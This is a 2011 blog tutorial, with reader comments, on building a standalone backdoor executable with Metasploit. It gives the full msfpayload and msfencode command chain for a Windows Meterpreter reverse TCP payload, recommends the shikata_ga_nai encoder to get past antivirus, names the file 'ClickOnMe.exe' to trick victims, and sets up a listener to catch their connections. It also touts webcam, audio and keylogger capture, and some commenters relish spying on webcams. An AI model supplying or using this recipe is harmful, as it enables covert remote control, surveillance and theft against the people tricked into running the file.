Tuesday, March 1, 2011

Creating Standalone Backdoor Binaries Using Metasploit

Here's the highly anticipated Metasploit tutorial! Since Metasploit has so much to offer, it would be impossible to capture every single aspect of it in a single post. So, I'm going to do this in parts; each part will have a specific topic, such as creating standalone binaries. Specifically, the binary I'm going to show you how to create will drop a Reverse TCP payload on a victim's computer. Basically, the user's computer will connect back to the attacker's IP over the Internet (TCP/IP), and will listen to the attacker's computer for commands. I'm going to include a Meterpreter payload as well. Meterpreter can best be summed up as a "smart shell". It comes preloaded with Ruby scripts that can make actions such as taking screenshots, recording audio, starting a keylogger, or even taking video from a webcam on the victim's computer as easy as typing in a single command. Scary, huh?

About this tutorial: I am not responsible for whatever you do with this. Neither is Blogger, or anyone else. Responsibility is left up to you, since this is meant for informational purposes only. On that note, lets continue.

Step 1: Install Metasploit

Before you can even begin using Metasploit, you need to install it. I received a unanimous decision in the previous post to use Windows as a platform. This has good and bad news. Good news? There's a Windows binary for it, no need to compile it yourself. Bad news? It's in Ubuntu's software repository, so it's even easier for Linux users. Actually, that probably isn't bad news. Anyway, continuing...

1. Download the executable from the Metasploit download site. It's right on the top, so it shouldn't be too hard. I'd suggest installing the full version with Java and Console2, but that will just help us out in the later tutorials.

2. Install the software. It's really straightforward. Just click, click, click and done. That's it.

Step 2: Opening the Metasploit Console

Sure, there is a GUI for Metasploit, but it's more fun to use the console, right? Actually, the console makes it a lot easier to control your shell/Meterpreter sessions once you can connect, but we'll see that later.

1. Open the Metasploit Console by going to Start>All Programs>Metasploit Framework>Metasploit Console. You should be greeted with a happy console, all ready to go. It may take a little time to start up, since it has to load all the modules.

Step 3: Creating the Executable With msfpayload

So you should already have the Metasploit Console open, referred to as msfconsole from here out. This executable is going to be created in a single long command, so don't hit enter until you reach the end!

1. You need to find out your IP. You can do this by using a free website like this, or if you think you're a pro you can use the command ipconfig on Windows or ifconfig on *nix systems. 

2. First, you need to specify which type of exploit you'll be using. In our case, we're not using an exploit at all. Instead, we'll use the utility msfpayload. This will let us redirect a payload into an executable. So far we have this:

msf > msfpayload

3. Next, we want to tell Metasploit that the payload we want to use is a Meterpreter shell spawned via a reverse TCP connection. The windows/meterpreter/reverse_tcp payload is exactly that!

msf > msfpayload windows/meterpreter/reverse_tcp

4. Now we need to use our settings from before. We will set the LHOST variable to your (the attacker's) IP. We will also choose a port (LPORT) for the connection. In this case, I choose port 1337. Note that I also add "R" to the end, telling msfpayload to make it's output raw data, which we can later manipulate using msfencode.

msf > msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R

Now this in itself is enough to output the payload. However, we don't have use for random binary gibberish. The next step will let us pipe the output (don't hit enter yet) through msfencode in order to make it a usable binary and even encode it.

Step 4: Placing it in an Executable and Encoding It

1. Continuing from before, we want to pipe the output into another program (msfencode) using the "|" operator.

msf > msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R| msfencode 

2. We need to tell msfencode that we want it to output an executable rather than raw data. So, we use the -t option.

msf > msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R| msfencode -t exe

3. This next step is optional, but I highly recommend it so that your new backdoor won't get immediately shutdown by antivirus software. What is this black magic that will protect your binary? That's right, an encoder! We tell msfencode that we want it to encode our executable using the -e option. In this case, I use the "shikata ga nai" encoder, my personal favorite.

msf > msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R| msfencode -t exe -e x86/shikata_ga_nai

4. The last step is to send the output of this monster command to a new file of your choosing. I chose to name it ClickOnMe.exe (sneaky, right?)

msf > msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=1337 R| msfencode -t exe -e x86/shikata_ga_nai >> ClickOnMe.exe

5. That's it! Now just press enter and you should have a nice executable waiting for you in whatever directory you're in!

Step 5: Opening a Listener

Now that we have our binary done, we need to open a listener in Metasploit so that we can catch the incoming reverse TCP connections from our victims.

1. Still in msfconsole. We need to tell msfconsole that we want to open a listener. You can press enter after each of the following commands:

msf > use exploit/multi/handler

2.  Next, we need to tell it what time of connection from the payload it should be looking for. Since we used a reverse TCP Meterpreter shell for our executable, we need to tell it this:

msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp

3. Finally, we need to pass the options (attacker [your] IP, and the listening port) that we placed in the executable to msfconsole. We use the "set" operator to do this:

msf exploit(handler)> set LHOST=sameIPfromBefore
msf exploit(handler)> set LPORT=1337

4. That's it! Just tell msfconsole to start, and we'll have a listener waiting for connections! Keep the program running for as long as you want to listen.

msf exploit(handler)> exploit -j

Listener started

That's it! Remember, with great power comes great responsibility.


  1. I don't know if it makes me a super nerd, but whenever I use a console to input commands, I feel like a total boss lol, anyways great stuff dude!

  2. my..brain...hurts. Good job though man. I admire programmers and respect their patience.

  3. Oh the fun that can be had the consoles and webcams...

  4. Wow, I didn't know you could use an encoder to protect my binary!

  5. really interesting man, thanks for the post!

  6. Too technical for my tastes. Buts it's good to know.

  7. Neat, so you can listen in once you know you've being attacked. How do you know you're being attacked, though?

  8. SKS FKF: When you're being attacked, you have no idea. It's the attacker who listens in :)

  9. I'm sure the universities in Siberia teach this in the hacking dept.

  10. good guide to metasploit. i can't wait to download and try it out.


Please leave a comment